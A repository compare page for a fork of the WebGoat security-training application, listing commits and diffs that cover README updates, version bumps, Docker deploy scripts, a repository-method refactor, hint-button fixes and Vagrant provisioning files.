dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: dubey:v8.0.0.M6
Branches Tags
dubey:main dubey:nbaars/refactor-plugin-message dubey:nbaars/1873 dubey:nbaars/build dubey:lang-es dubey:gh-1165 dubey:gh-1329 dubey:develop dubey:label-hint-tests dubey:helm-webgoat dubey:helm
dubey:v2025.3 dubey:v2025.2 dubey:v2025.1 dubey:v2025.0 dubey:v2023.8 dubey:v2023.7 dubey:v2023.6 dubey:v2023.5 dubey:v2023.4 dubey:v2023.04 dubey:v2023.3 dubey:v2023.2 dubey:v2023.1 dubey:v2023.0 dubey:v8.2.2 dubey:v8.2.1 dubey:v8.2.0 dubey:vtest10 dubey:vtest9 dubey:vtest8 dubey:vtest7 dubey:vtest6 dubey:vtest5 dubey:vtest4 dubey:vtest3 dubey:vtest2 dubey:vtest1 dubey:vtest dubey:test-v19 dubey:test-v18 dubey:test-v17 dubey:test-v16 dubey:test-v15 dubey:test-v14 dubey:test-v13 dubey:test-v12 dubey:test-v11 dubey:test-v10 dubey:test-v9 dubey:test-v8 dubey:test-v7 dubey:test-v6 dubey:test-v5 dubey:test-v4 dubey:test-v3 dubey:test-v2 dubey:test-v1.0 dubey:v8.1.0 dubey:v8.0.0.M26 dubey:v8.0.0.M25 dubey:v8.0.0.M24 dubey:v8.0.0.M23 dubey:v8.0.0.M22 dubey:v8.0.0.M21 dubey:v8.0.0.M20 dubey:v8.0.0.M19 dubey:v8.0.0.M18 dubey:v8.0.0.M17 dubey:v8.0.0.M16 dubey:v8.0.0 dubey:v8.0.0.M15 dubey:v8.0.0.M14 dubey:v8.0.0.M13 dubey:v8.0.0.M12 dubey:v8.0.0.M11 dubey:v8.0.0.M10 dubey:v8.0.0.M9 dubey:v8.0.0.M8 dubey:8.0.0 dubey:v8.0.0.M7 dubey:v8.0.0.M6 dubey:v8.0.0.M5 dubey:v8.0.0.M4 dubey:v8.0.0.M3 dubey:v8.0.0.M2 dubey:v8.0.0.M1 dubey:7.1 dubey:7.0.1
..
compare: dubey:v8.0.0.M14
Branches Tags
dubey:main dubey:nbaars/refactor-plugin-message dubey:nbaars/1873 dubey:nbaars/build dubey:lang-es dubey:gh-1165 dubey:gh-1329 dubey:develop dubey:label-hint-tests dubey:helm-webgoat dubey:helm
dubey:v2025.3 dubey:v2025.2 dubey:v2025.1 dubey:v2025.0 dubey:v2023.8 dubey:v2023.7 dubey:v2023.6 dubey:v2023.5 dubey:v2023.4 dubey:v2023.04 dubey:v2023.3 dubey:v2023.2 dubey:v2023.1 dubey:v2023.0 dubey:v8.2.2 dubey:v8.2.1 dubey:v8.2.0 dubey:vtest10 dubey:vtest9 dubey:vtest8 dubey:vtest7 dubey:vtest6 dubey:vtest5 dubey:vtest4 dubey:vtest3 dubey:vtest2 dubey:vtest1 dubey:vtest dubey:test-v19 dubey:test-v18 dubey:test-v17 dubey:test-v16 dubey:test-v15 dubey:test-v14 dubey:test-v13 dubey:test-v12 dubey:test-v11 dubey:test-v10 dubey:test-v9 dubey:test-v8 dubey:test-v7 dubey:test-v6 dubey:test-v5 dubey:test-v4 dubey:test-v3 dubey:test-v2 dubey:test-v1.0 dubey:v8.1.0 dubey:v8.0.0.M26 dubey:v8.0.0.M25 dubey:v8.0.0.M24 dubey:v8.0.0.M23 dubey:v8.0.0.M22 dubey:v8.0.0.M21 dubey:v8.0.0.M20 dubey:v8.0.0.M19 dubey:v8.0.0.M18 dubey:v8.0.0.M17 dubey:v8.0.0.M16 dubey:v8.0.0 dubey:v8.0.0.M15 dubey:v8.0.0.M14 dubey:v8.0.0.M13 dubey:v8.0.0.M12 dubey:v8.0.0.M11 dubey:v8.0.0.M10 dubey:v8.0.0.M9 dubey:v8.0.0.M8 dubey:8.0.0 dubey:v8.0.0.M7 dubey:v8.0.0.M6 dubey:v8.0.0.M5 dubey:v8.0.0.M4 dubey:v8.0.0.M3 dubey:v8.0.0.M2 dubey:v8.0.0.M1 dubey:7.1 dubey:7.0.1

35 Commits
v8.0.0.M6 ... v8.0.0.M14

Author SHA1 Message Date
Nanne Baars
f30db3abfc New version number 2018-04-11 20:45:12 +02:00
Nanne Baars
58d4b81df2 Wrong image name mentioned in lesson for WebWolf 2018-04-11 20:22:19 +02:00
nbaars
2ae1b4955f By default binds to ALL network interfaces #431 
Fix for Docker not binding to any address by default
 2018-01-30 07:18:05 +01:00
nbaars
13a4b69cbe All lesson flags are displayed while running webgoat 8.0 standalone java file #430 2018-01-29 15:43:19 +01:00
nbaars
98efc1235f By default binds to ALL network interfaces #431 2018-01-29 15:32:02 +01:00
nbaars
b99b554522 Version: docker 8.0.0.M9 Multiple users can't finalize the same lesson #432 2018-01-29 15:29:48 +01:00
nbaars
04ccf9a422 New release should create a new webgoat directory with version tag inside #423 2018-01-21 17:46:43 +01:00
nbaars
ee11381a63 Fixed database issue mappings 2018-01-21 17:13:28 +01:00
nbaars
2cc6c232e2 Added macro for asciidoc to produce the WebWolf link dynamically depending on configuration 2018-01-15 20:56:59 +01:00
nbaars
dec55d52ca Replaced quotes with normal character (Version: 8.0.0.M5 Character Encoding Issues #411) 2018-01-14 13:22:28 +01:00
Noah Hansen
568fa82270 fixed ContentTypeAssignment and SimpleXXE to work with MacOSX 2018-01-13 16:00:11 +00:00
Jason Hilton
bad60c43c0 vagrant-training is where the vagrant file is 2018-01-13 15:55:42 +00:00
nbaars
a6b9235711 SQL Error '-104' in XSS Lesson Page 7 #416 2018-01-10 12:48:45 +01:00
nbaars
253a2f16ed Unable to see buttons like HTTP request parameters, the HTTP request cookies, and the Java source code #417 2018-01-10 12:04:28 +01:00
nbaars
e801b0917d Unable to save email send to WebWolf #419 2018-01-10 09:19:20 +01:00
nbaars
ae92ac6808 Changed the Vagrantfile to contain the correct release name 
Deleted the Vagrant files for setting up dev environment, today it is
easy to setup the dev environment yourself to start working.
 2018-01-09 12:42:57 +01:00
nbaars
a9ac00a075 Clean up 2018-01-08 23:42:36 +01:00
Nanne Baars
0120c7c3a6 Updating README.md 2018-01-02 22:50:10 +01:00
nbaars
5bbdb8893c Not making a Docker release is we build develop (putting a tag will create a release which is more a controlled/intuitive way to make a release to Docker) 
(cherry picked from commit e3e7ed0)
 2018-01-02 22:20:38 +01:00
nbaars
05d8b590f3 Merge tag '8.0.0' into develop 
Release 8.0.0
 2017-12-30 16:52:24 +01:00
nbaars
114fbc5760 Merge branch 'release/8.0.0' 2017-12-30 16:50:39 +01:00
nbaars
32311a80da Updating readme 2017-12-30 16:25:10 +01:00
nbaars
d3ee9431d8 Tagging latest Docker build with Travis as well 2017-12-30 14:13:34 +01:00
Magicansk
a11e6911cd Update and rename sol.txt to sol.MD 
Add md syntax
 2017-11-02 13:09:49 +01:00
Magicansk
5614cda0bf Update getting-started.MD 2017-11-02 13:09:23 +01:00
Magicansk
69d44aed5b Update and rename getting-started.txt to getting-started.MD 
Change .txt to .md.
Add all the markdown syntax and fixed the xml syntax
 2017-11-02 13:09:23 +01:00
misfir3
f6911b49a7 Merge pull request #402 from misfir3/develop 
more hints/helps cleanup
 2017-10-30 09:03:03 -06:00
Jason
24cf806787 more hints/helps cleanup 2017-10-25 18:05:08 -06:00
misfir3
1ac305e9b9 Merge pull request #399 from misfir3/develop 
#351 - using listenToOnce to get rid of redundant calls
 2017-10-25 17:13:11 -06:00
Jason
c6f1c5cd2a #351 - using listenToOnce to get rid of redundant calls 2017-10-25 17:11:54 -06:00
Magicansk
74218de135 Update README.MD 2017-10-25 21:43:58 +02:00
Sönke
1f6d7fdc39 Update Java Version 
Solves #385
 2017-10-23 23:36:35 +02:00
Sönke
cce1945f23 Fix Apt Error for Google Repository 
See https://askubuntu.com/questions/724093/no-more-updates-for-google-chrome-apt-get-update-error
 2017-10-23 23:35:40 +02:00
Nanne Baars
45d48a8776 Update README.MD 2016-12-23 15:58:09 +01:00
Doug Morato
50904cf69b Adding Changelog 
Adding Changelog file for WebGoat releases

Signed-off-by: Doug Morato <dm@corp.io>
 2016-11-18 21:32:41 -05:00
72 changed files with 539 additions and 478 deletions
Expand all files Collapse all files

31
README.MD
View File

@ -1,15 +1,11 @@
# WebGoat: A deliberately insecure Web Application
# WebGoat 8: A deliberately insecure Web Application
[![Build Status](https://travis-ci.org/WebGoat/WebGoat.svg?branch=develop)](https://travis-ci.org/WebGoat/WebGoat)
[![Coverage Status](https://coveralls.io/repos/WebGoat/WebGoat/badge.svg?branch=develop&service=github)](https://coveralls.io/github/WebGoat/WebGoat?branch=master)
[![Codacy Badge](https://api.codacy.com/project/badge/b69ee3a86e3b4afcaf993f210fccfb1d)](https://www.codacy.com/app/dm/WebGoat)
[![Dependency Status](https://www.versioneye.com/user/projects/562da95ae346d7000e0369aa/badge.svg?style=flat)](https://www.versioneye.com/user/projects/562da95ae346d7000e0369aa)
[![OWASP Labs](https://img.shields.io/badge/owasp-labs-orange.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
# Important
This is the development version of WebGoat 8, if you are looking for a released stable version please go to: https://github.com/WebGoat/WebGoat/wiki/Running-WebGoat
[![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
[![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)
# Introduction
@ -68,6 +64,20 @@ Download the latest WebWolf release from [https://github.com/WebGoat/WebGoat/rel
java -jar webgoat-server-<<version>>.jar
```
By default WebGoat starts at port 8080 in order to change this use the following property:
```Shell
java -jar webgoat-server-<<version>>.jar --server.port=9090
```
You can specify one of the following arguments when starting WebGoat:
```Shell
java -jar webgoat-server-<<version>>.jar --server.port=9090 --server.address=x.x.x.x
```
This will start WebGoat on a different port and/or different address.
## 3. Run from the sources
@ -99,7 +109,8 @@ mvn -pl webgoat-server spring-boot:run
```
... you should be running webgoat on localhost:8080/WebGoat momentarily
To change IP addresss add the following variable to WebGoat/webgoat-container/src/main/resources/application.properties file
To change IP address add the following variable to WebGoat/webgoat-container/src/main/resources/application.properties file
```
server.address=x.x.x.x
@ -110,7 +121,7 @@ server.address=x.x.x.x
We supply a complete development environment using Vagrant, to run WebGoat with Vagrant you must first have Vagrant and Virtualbox installed.
```shell
$ cd WebGoat/webgoat-images/vagrant-users
$ cd WebGoat/webgoat-images/vagrant-training
$ vagrant up
```
@ -120,6 +131,8 @@ The source code will be available in the home directory.
# Building a new Docker image
NOTE: Travis will create a new Docker image automatically when making a new release.
WebGoat now has Docker support for x86 and ARM (raspberry pi).
### Docker on x86
On x86 you can build a container with the following commands:

4
pom.xml
View File

@ -5,7 +5,7 @@
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<packaging>pom</packaging>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
<name>WebGoat Parent Pom</name>
<description>Parent Pom for the WebGoat Project. A deliberately insecure Web Application</description>
@ -20,7 +20,7 @@
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.5.5.RELEASE</version>
<version>1.5.9.RELEASE</version>
</parent>
<licenses>

24
scripts/deploy-webgoat.sh
View File

@ -12,10 +12,28 @@ if [ "${BRANCH}" == "master" ] && [ ! -z "${TRAVIS_TAG}" ]; then
docker push $REPO
elif [ ! -z "${TRAVIS_TAG}" ]; then
# Creating a tag build we push it to Docker with that tag
docker build --build-arg webgoat_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} .
docker build --build-arg webgoat_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} -t $REPO:latest .
docker push $REPO
elif [ "${BRANCH}" == "develop" ]; then
docker build -f Dockerfile -t $REPO:snapshot .
#elif [ "${BRANCH}" == "develop" ]; then
# docker build -f Dockerfile -t $REPO:snapshot .
# docker push $REPO
else
echo "Skipping releasing to DockerHub because it is a build of branch ${BRANCH}"
fi
export REPO=webgoat/webwolf
cd ..
cd webwolf
ls target/
if [ "${BRANCH}" == "master" ] && [ ! -z "${TRAVIS_TAG}" ]; then
# If we push a tag to master this will update the LATEST Docker image and tag with the version number
docker build --build-arg webwolf_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:latest -t $REPO:${TRAVIS_TAG} .
docker push $REPO
elif [ ! -z "${TRAVIS_TAG}" ]; then
# Creating a tag build we push it to Docker with that tag
docker build --build-arg webwolf_version=${TRAVIS_TAG:1} -f Dockerfile -t $REPO:${TRAVIS_TAG} -t $REPO:latest .
docker push $REPO
else
echo "Skipping releasing to DockerHub because it is a build of branch ${BRANCH}"

1
webgoat-container/documentation/csrf-lesson.gliffy
View File

File diff suppressed because one or more lines are too long

BIN
webgoat-container/documentation/csrf-lessons.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 16 KiB

2
webgoat-container/pom.xml
View File

@ -10,7 +10,7 @@
<parent>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<profiles>

5
webgoat-container/src/main/java/org/owasp/webgoat/AsciiDoctorTemplateResolver.java
View File

@ -34,6 +34,8 @@ import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
import lombok.extern.slf4j.Slf4j;
import org.asciidoctor.Asciidoctor;
import org.asciidoctor.extension.JavaExtensionRegistry;
import org.owasp.webgoat.asciidoc.WebWolfMacro;
import org.owasp.webgoat.i18n.Language;
import org.thymeleaf.TemplateProcessingParameters;
import org.thymeleaf.resourceresolver.IResourceResolver;
@ -82,6 +84,9 @@ public class AsciiDoctorTemplateResolver extends TemplateResolver {
return new ByteArrayInputStream(new byte[0]);
} else {
StringWriter writer = new StringWriter();
JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
asciidoctor.convert(new InputStreamReader(is), writer, createAttributes());
return new ByteArrayInputStream(writer.getBuffer().toString().getBytes(UTF_8));
}

25
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java Normal file
View File

@ -0,0 +1,25 @@
package org.owasp.webgoat.asciidoc;
import org.springframework.beans.BeansException;
import org.springframework.context.ApplicationContext;
import org.springframework.context.ApplicationContextAware;
import org.springframework.core.env.Environment;
import org.springframework.stereotype.Component;
/**
* Make environment available in the asciidoc code (which you cannot inject because it is handled by the framework)
*/
@Component
public class EnvironmentExposure implements ApplicationContextAware {
private static ApplicationContext context;
public static Environment getEnv() {
return context.getEnvironment();
}
@Override
public void setApplicationContext(ApplicationContext applicationContext) throws BeansException {
context = applicationContext;
}
}

36
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java Normal file
View File

@ -0,0 +1,36 @@
package org.owasp.webgoat.asciidoc;
import org.asciidoctor.ast.AbstractBlock;
import org.asciidoctor.extension.InlineMacroProcessor;
import org.springframework.core.env.Environment;
import org.springframework.util.StringUtils;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import javax.servlet.http.HttpServletRequest;
import java.util.Map;
public class WebWolfMacro extends InlineMacroProcessor {
public WebWolfMacro(String macroName, Map<String, Object> config) {
super(macroName, config);
}
@Override
protected String process(AbstractBlock parent, String target, Map<String, Object> attributes) {
Environment env = EnvironmentExposure.getEnv();
String hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
return "<a href=\"" + hostname + "\" target=\"_blank\">" + target + "</a>";
}
/**
* Look at the remote address from received from the browser first. This way it will also work if you run
* the browser in a Docker container and WebGoat on your local machine.
*/
private String determineHost(String host, String port) {
HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
String ip = request.getRemoteAddr();
String hostname = StringUtils.hasText(ip) ? ip : host;
return "http://" + hostname + ":" + port + "/WebWolf";
}
}

2
webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java
View File

@ -55,7 +55,7 @@ public abstract class AssignmentEndpoint extends Endpoint {
//// TODO: 11/13/2016 events better fit?
protected AttackResult trackProgress(AttackResult attackResult) {
UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
if (userTracker == null) {
userTracker = new UserTracker(webSession.getUserName());
}

27
webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java
View File

@ -1,11 +1,9 @@
package org.owasp.webgoat.lessons;
import com.google.common.collect.Lists;
import lombok.*;
import javax.persistence.Entity;
import javax.persistence.Id;
import javax.persistence.OneToMany;
import javax.persistence.Transient;
import javax.persistence.*;
import java.util.List;
/**
@ -37,19 +35,30 @@ import java.util.List;
* @version $Id: $Id
* @since November 25, 2016
*/
@AllArgsConstructor
@RequiredArgsConstructor
@NoArgsConstructor
@Getter
@EqualsAndHashCode
@Entity
public class Assignment {
@NonNull
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
private String name;
@NonNull
private String path;
@Transient
private List<String> hints;
private Assignment() {
//Hibernate
}
public Assignment(String name, String path) {
this(name, path, Lists.newArrayList());
}
public Assignment(String name, String path, List<String> hints) {
this.name = name;
this.path = path;
this.hints = hints;
}
}

2
webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java
View File

@ -73,7 +73,7 @@ public class LessonMenuService {
List<LessonMenuItem> showLeftNav() {
List<LessonMenuItem> menu = new ArrayList<>();
List<Category> categories = course.getCategories();
UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
for (Category category : categories) {
LessonMenuItem categoryItem = new LessonMenuItem();

4
webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java
View File

@ -40,7 +40,7 @@ public class LessonProgressService {
@RequestMapping(value = "/service/lessonprogress.mvc", produces = "application/json")
@ResponseBody
public Map getLessonInfo() {
UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
LessonTracker lessonTracker = userTracker.getLessonTracker(webSession.getCurrentLesson());
Map json = Maps.newHashMap();
String successMessage = "";
@ -63,7 +63,7 @@ public class LessonProgressService {
@RequestMapping(value = "/service/lessonoverview.mvc", produces = "application/json")
@ResponseBody
public List<LessonOverview> lessonOverview() {
UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
AbstractLesson currentLesson = webSession.getCurrentLesson();
List<LessonOverview> result = Lists.newArrayList();
if ( currentLesson != null ) {

2
webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java
View File

@ -64,7 +64,7 @@ public class ReportCardService {
@GetMapping(path = "/service/reportcard.mvc", produces = "application/json")
@ResponseBody
public ReportCard reportCard() {
UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
List<AbstractLesson> lessons = course.getLessons();
ReportCard reportCard = new ReportCard();
reportCard.setTotalNumberOfLessons(course.getTotalOfLessons());

2
webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java
View File

@ -59,7 +59,7 @@ public class RestartLessonService {
AbstractLesson al = webSession.getCurrentLesson();
log.debug("Restarting lesson: " + al);
UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
userTracker.reset(al);
userTrackerRepository.save(userTracker);
}

7
webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java
View File

@ -47,13 +47,16 @@ import java.util.stream.Collectors;
*/
@Entity
public class LessonTracker {
@Getter
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
@Getter
private String lessonName;
@OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
private final Set<Assignment> solvedAssignments = Sets.newHashSet();
@OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
private final List<Assignment> allAssignments = Lists.newArrayList();
private final Set<Assignment> allAssignments = Sets.newHashSet();
@Getter
private int numberOfAttempts = 0;

2
webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java
View File

@ -38,7 +38,7 @@ public class Scoreboard {
List<WebGoatUser> allUsers = userRepository.findAll();
List<Ranking> rankings = Lists.newArrayList();
for (WebGoatUser user : allUsers) {
UserTracker userTracker = userTrackerRepository.findOne(user.getUsername());
UserTracker userTracker = userTrackerRepository.findByUser(user.getUsername());
rankings.add(new Ranking(user.getUsername(), challengesSolved(userTracker)));
}
return rankings;

6
webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java
View File

@ -2,6 +2,7 @@
package org.owasp.webgoat.users;
import com.google.common.collect.Lists;
import com.google.common.collect.Sets;
import lombok.extern.slf4j.Slf4j;
import org.owasp.webgoat.lessons.AbstractLesson;
import org.owasp.webgoat.lessons.Assignment;
@ -10,6 +11,7 @@ import javax.persistence.*;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.Set;
import java.util.stream.Collectors;
@ -48,9 +50,11 @@ import java.util.stream.Collectors;
public class UserTracker {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
private String user;
@OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
private List<LessonTracker> lessonTrackers = Lists.newArrayList();
private Set<LessonTracker> lessonTrackers = Sets.newHashSet();
private UserTracker() {}

1
webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java
View File

@ -8,5 +8,6 @@ import org.springframework.data.jpa.repository.JpaRepository;
*/
public interface UserTrackerRepository extends JpaRepository<UserTracker, String> {
UserTracker findByUser(String user);
}

5
webgoat-container/src/main/resources/application.properties
View File

@ -3,6 +3,7 @@ server.error.path=/error.html
server.session.timeout=600
server.contextPath=/WebGoat
server.port=8080
server.address=127.0.0.1
spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/data/webgoat
spring.jpa.hibernate.ddl-auto=update
@ -20,8 +21,8 @@ spring.resources.cache-period=0
spring.thymeleaf.cache=false
webgoat.clean=false
webgoat.server.directory=${user.home}/.webgoat/
webgoat.user.directory=${user.home}/.webgoat/
webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
webgoat.user.directory=${user.home}/.webgoat-${webgoat.build.version}/
webgoat.build.version=@project.version@
webgoat.build.number=@build.number@
webgoat.email=webgoat@owasp.org

12
webgoat-container/src/main/resources/static/js/goatApp/controller/LessonController.js
View File

@ -74,7 +74,7 @@ define(['jquery',
this.loadLesson = function(name,pageNum) {
if (this.name === name) {
this.listenTo(this.lessonHintView, 'hints:showButton', this.onShowHintsButton);
this.listenToOnce(this.lessonHintView, 'hints:showButton', this.onShowHintsButton);
this.listenTo(this.lessonHintView, 'hints:hideButton', this.onHideHintsButton);
this.lessonContentView.navToPage(pageNum);
this.lessonHintView.hideHints();
@ -102,12 +102,13 @@ define(['jquery',
hasSource:this.lessonInfoModel.get('hasSource')
});
this.listenTo(this.helpControlsView,'hints:show',this.showHints);
this.listenTo(this.helpControlsView,'hints:show',this.showHintsView);
this.listenTo(this.helpControlsView,'lesson:restart',this.restartLesson);
this.listenTo(this.developerControlsView, 'dev:labels', this.restartLesson);
this.helpControlsView.render();
this.showHintsView();
this.titleView.render(this.lessonInfoModel.get('lessonTitle'));
};
@ -180,8 +181,13 @@ define(['jquery',
// }
// };
this.showHints = function() {
this.showHintsView = function() {
this.lessonHintView.render();
if (this.lessonHintView.getHintsCount > 0) {
this.helpControlsView.showHintsButton();
} else {
this.helpControlsView.hideHintsButton();
}
};
this.restartLesson = function() {

4
webgoat-container/src/main/resources/static/js/goatApp/view/HintView.js
View File

@ -126,6 +126,10 @@ function($,
} else {
this.$el.find('#show-prev-hint').css('visibility','visible');
}
},
getHintsCount: function () {
return this.collection.length;
}
});

2
webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java
View File

@ -62,7 +62,7 @@ public class AssignmentEndpointTest {
public void init(AssignmentEndpoint a) {
messages.setBasenames("classpath:/i18n/messages", "classpath:/i18n/WebGoatLabels");
when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
ReflectionTestUtils.setField(a, "userTrackerRepository", userTrackerRepository);
ReflectionTestUtils.setField(a, "userSessionData", userSessionData);
ReflectionTestUtils.setField(a, "webSession", webSession);

4
webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java
View File

@ -63,7 +63,7 @@ public class LessonMenuServiceTest {
when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1, l2));
when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
.andExpect(status().isOk())
@ -81,7 +81,7 @@ public class LessonMenuServiceTest {
when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1));
when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))

2
webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java
View File

@ -72,7 +72,7 @@ public class LessonProgressServiceTest {
@Before
public void setup() {
Assignment assignment = new Assignment("test", "test");
when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
when(websession.getCurrentLesson()).thenReturn(lesson);
when(lessonTracker.getLessonOverview()).thenReturn(Maps.newHashMap(assignment, true));

2
webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java
View File

@ -53,7 +53,7 @@ public class ReportCardServiceTest {
when(course.getTotalOfLessons()).thenReturn(1);
when(course.getTotalOfAssignments()).thenReturn(10);
when(course.getLessons()).thenReturn(Lists.newArrayList(lesson));
when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
mockMvc.perform(MockMvcRequestBuilders.get("/service/reportcard.mvc"))
.andExpect(status().isOk())

6
webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java
View File

@ -62,7 +62,7 @@ public class UserTrackerRepositoryTest {
userTrackerRepository.save(userTracker);
userTracker = userTrackerRepository.findOne("test");
userTracker = userTrackerRepository.findByUser("test");
Assertions.assertThat(userTracker.getLessonTracker("test")).isNotNull();
}
@ -77,7 +77,7 @@ public class UserTrackerRepositoryTest {
userTrackerRepository.saveAndFlush(userTracker);
userTracker = userTrackerRepository.findOne("test");
userTracker = userTrackerRepository.findByUser("test");
Assertions.assertThat(userTracker.numberOfAssignmentsSolved()).isEqualTo(1);
}
@ -90,7 +90,7 @@ public class UserTrackerRepositoryTest {
userTracker.assignmentFailed(lesson);
userTrackerRepository.saveAndFlush(userTracker);
userTracker = userTrackerRepository.findOne("test");
userTracker = userTrackerRepository.findByUser("test");
userTracker.assignmentFailed(lesson);
userTracker.assignmentFailed(lesson);
userTrackerRepository.saveAndFlush(userTracker);

32
webgoat-images/vagrant-developers/Vagrantfile vendored
View File

@ -1,32 +0,0 @@
Vagrant.configure(2) do |config|
config.vm.box = "boxcutter/ubuntu1604-desktop"
config.vm.provider "virtualbox" do |vb|
vb.gui = true
vb.memory = "4096"
vb.cpus = 2
vb.name = "WebGoat-Development"
vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
end
config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
config.vm.provision 'shell' do |s|
s.path = '../vagrant_provision.sh'
s.privileged = true
end
config.vm.provision :shell, privileged:false, inline: <<-SHELL
echo -e "Cloning the WebGoat container repository"
git clone -b master https://github.com/WebGoat/WebGoat.git
echo -e "Cloning the WebGoat Lessons repository"
git clone -b master https://github.com/WebGoat/WebGoat-Lessons.git
SHELL
config.vm.provision 'shell' do |s|
s.inline = "echo Finished provisioning, login with user vagrant pass vagrant"
end
end

35
webgoat-images/vagrant-training/Vagrantfile vendored Normal file
View File

@ -0,0 +1,35 @@
# Setup a Linux box headless which will start WebGoat and WebWolf helpful image to give away during training
Vagrant.configure(2) do |config|
config.vm.box = "ubuntu/trusty64"
config.vm.network :forwarded_port, guest: 8080, host: 8080
config.vm.network :forwarded_port, guest: 8081, host: 8081
config.vm.provider "virtualbox" do |vb|
vb.gui = false
vb.memory = "4096"
vb.cpus = 2
vb.name = "WebGoat-Training"
vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
end
config.vm.provider "vmware_fusion" do |vf|
vf.gui = false
vf.vmx["memsize"] = 4096
vf.vmx["numvcpus"] = 2
vf.vmx["displayname"] = "WebGoat-Training"
end
config.vm.provision "shell", inline: <<-SHELL
wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webgoat-server-8.0.0.RELEASE.jar
